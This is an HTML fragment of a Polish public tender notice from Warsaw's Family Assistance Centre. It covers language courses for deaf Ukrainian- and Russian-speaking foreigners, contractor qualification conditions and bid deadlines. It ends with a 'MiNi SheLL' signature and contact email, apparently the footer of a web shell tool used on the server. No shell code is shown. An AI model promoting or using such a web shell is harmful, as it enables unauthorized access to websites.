class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie lektorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie części III. Kurs języka polskiego jako obcego dla dorosłych niesłyszących cudzoziemców (ukraińsko-rosyjskojęzycznych), klientów Warszawskiego Centrum Pomocy Rodzinie.<br/>1)	Kursy będą realizowane w formie zajęć grupowych stacjonarnych.<br/>2)	Miejscem organizacji kursu będzie lokal pozostający w dyspozycji Wykonawcy, przystosowany i dostępny dla osób z niepełnosprawnością.<br/>3)	Kursant zgłosi się do Wykonawcy kursu ze Skierowaniem od Zamawiającego, które po wypełnieniu wszystkich pól informacyjnych Wykonawca przekaże do Zamawiającego.<br/>4)	Wykonawca przed rozpoczęciem zajęć dydaktycznych ustali poziom znajomości języka polskiego oraz dyspozycyjność w zakresie odpowiadających uczestnikowi dni i godzin zajęć (spotkań), w dalszej części zwane rekrutacją. Nastąpi to nie później niż w ciągu 6 dni od daty zgłoszenia się kursanta ze skierowaniem od Zamawiającego.<br/>5)	Wyniki rekrutacji Wykonawca przekaże Zamawiającemu zwracając wypełniony oryginał Skierowania w ciągu 6 dni od przeprowadzenia poziomowania i przydzielenia kursanta do grupy kursu. Kopię skierowania Wykonawca przekaże kursantowi.<br/>6)	Wykonawca przekaże do Zamawiającego również Skierowania niezakwalifikowanych na kursu Klientów z podaniem przyczyny. Utworzy też listę Klientów rezerwowych.<br/>7)	Indywidualne przypadki Klientów będą konsultowane pomiędzy Wykonawcą, a Zamawiającym. <br/>8)	Rekrutacja będzie przeprowadzana stacjonarnie w siedzibie Wykonawcy w formie ustnej i pisemnej w godzinach: 8:00-12:00 w 20% rekrutowanych oraz 15:00-20:00 w 50% rekrutowanych od poniedziałku do piątku oraz w godzinach 9:00-20:00 w soboty 30% rekrutowanych.<br/>9)	Wykonawca na pierwszych zajęciach zapewni każdemu uczestnikowi materiały piśmiennicze oraz materiały dydaktyczne niezbędne do właściwego przeprowadzenia zajęć. Wszelkie materiały piśmiennicze oraz dydaktyczne zostaną przekazane uczestnikom na własność. <br/>10)	Łączna liczba godzin kursów grupowych stacjonarnych:<br/>a)	pisany j. polski 240 h (2 grupy x 2 spotkań x łącznie 3 godziny tygodniowo),<br/>b)	migowy j. polski 160 h (2 grupy x 2 spotkań x 2 godziny tygodniowo).<br/>11)	Liczba prowadzonych łącznie grup : 4 grupy.<br/>12)	Czas jednego spotkania dla grupy: 1 godzina lekcyjna (1 godz. = 45min.) <br/>13)	Liczba uczestników w jednej grupie: 5 osób.<br/>14)	Łączna liczba spotkań dla jednej grupy zgodnie z harmonogramem:<br/>a)	60 spotkań (120 godzin lekcyjnych),<br/>b)	40 spotkań (80 godzin lekcyjnych).<br/>15)	Wykonawca będzie zobowiązany do dokumentowania frekwencji każdego uczestnika zajęć, bieżącego informowania o nieobecnościach.<br/>16)	Po zakończeniu realizacji zajęć Wykonawca wystawi uczestnikom certyfikaty ukończenia kursu na odpowiednim poziomie.<br/>17)	Zajęcia prowadzone będą pomocniczo w języku ukraińskim lub rosyjskim migowym w zależności od poziomu językowego lub potrzeb uczestników.<br/>18)	Realizacja umowy będzie rozliczana po każdym zakończonym miesiącu kalendarzowym.<br/>19)	Zamawiający zapłaci jedynie za faktycznie zrealizowane godziny zajęć dydaktycznych<br/>20)	Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1c do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80580000-3 - Oferowanie kursów językowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie lektorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> cz. I O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Warunek: o udzielenie zamówienia może ubiegać się wykonawca, który posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę Wykonawcy.<br/>2) zdolności technicznej lub zawodowej<br/>Warunek: o udzielenie zamówienia może ubiegać się Wykonawca, który:<br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert należycie wykonał lub wykonuje co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego jako obcego o wartości co najmniej 350 000,00 zł brutto;<br/>b)	dysponuje 10 lektorami języka polskiego jako obcego, którzy:<br/>i.	posiadają wykształcenie wyższe na kierunku filologia polska lub ukończyli studia w zakresie nauczania języka polskiego jako obcego (studia wyższe lub podyplomowe),<br/>ii.	posiadają doświadczenie w prowadzeniu kursów języka polskiego jako obcego, realizowanych na rzecz instytucji zewnętrznej, w wymiarze co najmniej 100 godzin;<br/>c)	dysponuje lokalem na terenie m.st. Warszawy zapewniającym, zgodne z wymogami bhp i p.poż., warunki do prowadzenia zajęć dydaktycznych w ramach przedmiotu zamówienia.<br/>Cz. II O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Warunek: o udzielenie zamówienia może ubiegać się wykonawca, który posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę Wykonawcy.<br/>2)	zdolności technicznej lub zawodowej<br/>Warunek: o udzielenie zamówienia może ubiegać się Wykonawca, który:<br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert należycie wykonał lub wykonuje co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego jako obcego o wartości co najmniej 100 000,00 zł brutto,<br/>b) dysponuje 7 lektorami języka polskiego jako obcego, którzy:<br/>i. posiadają wykształcenie wyższe na kierunku filologia polska lub ukończyli studia w zakresie nauczania języka polskiego jako obcego (studia wyższe lub podyplomowe),<br/>ii. posiadają doświadczenie w prowadzeniu kursów języka polskiego jako obcego, realizowanych na rzecz instytucji zewnętrznej w wymiarze minimum 100 godzin dla każdego z kursów;<br/>c) dysponuje lokalem na terenie m. st. Warszawy, spełniającym wymagania bhp oraz p.poż. oraz przystosowany i dostępny dla osób z niepełnosprawnością.<br/>Cz. III O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Warunek: o udzielenie zamówienia może ubiegać się wykonawca, który posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę Wykonawcy.<br/>2)	zdolności technicznej lub zawodowej; <br/>Warunek: o udzielenie zamówienia może ubiegać się Wykonawca, który:<br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert należycie wykonał lub wykonuje co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego jako obcego pisanego i co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego migowego o wartości co najmniej 50 000,00 zł brutto każdy;<br/>b) dysponuje 1 lektorem języka polskiego jako obcego pisanego, 1 lektorem języka polskiego migowego oraz 1 tłumaczem języka migowego ukraińskiego/rosyjskiego, którzy:<br/>i. posiadają wykształcenie wyższe na kierunku filologia polska lub ukończyli studia w zakresie nauczania języka polskiego jako obcego (studia wyższe lub podyplomowe), ukończyli kurs języka migowego polskiego, ukraińskiego lub rosyjskiego i posługują się tym językiem migowym,<br/>ii. posiadają doświadczenie w prowadzeniu kursów języka polskiego jako obcego pisanego i języka polskiego migowego dla cudzoziemców realizowanych na rzecz instytucji zewnętrznej, w wymiarze minimum 100 godzin dla każdego z kursów;<br/>c) dysponuje lokalem na terenie m. st. Warszawy, spełniającym wymagania bhp oraz p.poż. oraz przystosowany i dostępny dla osób z niepełnosprawnością. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie braku podstaw wykluczenia z postępowania wskazanych w Rozdziale VI SWZ – Załącznik nr 6 do SWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie zobowiązany jest złożyć każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Cz. I: <br/>1) wydruk z wpisu do RIS<br/>2) wykaz osób, skierowanych do realizacji zamówienia: minimum 10 lektorów języka polskiego jako obcego, którzy:<br/>- posiadają wykształcenie wyższe na kierunku filologia polska lub ukończyli studia w zakresie nauczania języka polskiego jako obcego (studia wyższe lub podyplomowe)<br/>- posiadają doświadczenie w prowadzeniu kursów języka polskiego jako obcego<br/>realizowanych na rzecz instytucji zewnętrznej w wymiarze co najmniej 100 godzin<br/>3) oświadczenie o dysponowaniu lokalem<br/>4) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, zawierający co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego jako obcego o wartości co najmniej 350 000,00 zł brutto, wykonaną w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, tematyki usługi, wartości, daty wykonania i podmiotu na rzecz którego została wykonana, wraz z załączeniem dowodów określających czy ta usługa została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane. <br/>Cz. II: <br/>1) wydruk z wpisu do RIS<br/>2)	wykaz osób, skierowanych do realizacji zamówienia: 7 lektorów języka polskiego jako obcego, którzy:<br/>- posiadają wykształcenie wyższe na kierunku filologia polska lub ukończyli studia w zakresie nauczania języka polskiego jako obcego (studia wyższe lub podyplomowe)<br/>- posiadają doświadczenie w prowadzeniu kursów języka polskiego jako obcego realizowanych na rzecz instytucji zewnętrznej w wymiarze minimum 100 godzin<br/>3)	Oświadczenie o dysponowaniu lokalem<br/>4)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych zawierającą co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego jako obcego o wartości co najmniej 100 000,00 zł brutto, wykonaną w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, tematyki usługi, wartości, daty wykonania i podmiotu na rzecz którego została wykonana, wraz z załączeniem dowodów określających czy ta usługa została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane<br/>Cz. III: <br/>1) wydruk z wpisu do RIS<br/>2) wykaz osób, skierowanych do realizacji zamówienia: 1 lektor języka polskiego jako obcego pisanego, 1 lektor języka polskiego migowego oraz 1 tłumacz języka migowego ukraińskiego/rosyjskiego, którzy odpowiednio:<br/>- posiadają wykształcenie wyższe na kierunku filologia polska lub ukończyli studia w zakresie nauczania języka polskiego jako obcego (studia wyższe lub podyplomowe), ukończyli kurs języka migowego polskiego, ukraińskiego lub rosyjskiego i posługują się tym językiem migowym<br/>- posiadają doświadczenie w prowadzeniu kursów języka polskiego jako obcego pisanego i języka polskiego migowego dla cudzoziemców realizowanych na rzecz instytucji zewnętrznej w wymiarze minimum 100 godzin każdy<br/>3) Oświadczenie o dysponowaniu lokalem<br/>4) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych zawierającą co najmniej 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego jako obcego pisanego i 1 (jedną) usługę polegającą na przeprowadzeniu kursu języka polskiego migowego o wartości co najmniej 50 000,00 zł brutto każdy, wykonaną w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, tematyki usługi, wartości, daty wykonania i podmiotu na rzecz którego została wykonana, wraz z załączeniem dowodów określających czy ta usługa została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy Pzp. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z ustanowionym pełnomocnikiem.<br/>2) Zgodnie z art. 58 ust. 5 ustawy Pzp przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w szczególności w zakresie przesłanek wykluczenia z postępowania.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia nie mogą podlegać wykluczeniu na podstawie tych przepisów, które dotyczą pojedynczych Wykonawców i które to Zamawiający określił w SWZ. Podstawy wykluczenia z postępowania nie mogą zachodzić wobec każdego z Wykonawców oddzielnie, wchodzących w skład konsorcjum, wykonawców wspólnie ubiegających się o zamówienie.<br/>3) W przypadku, gdy do realizacji zamówienia zostanie wybrana oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego udostępnienia kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian określono w załączniku nr 9 do SWZ - Wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Zamawiającego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com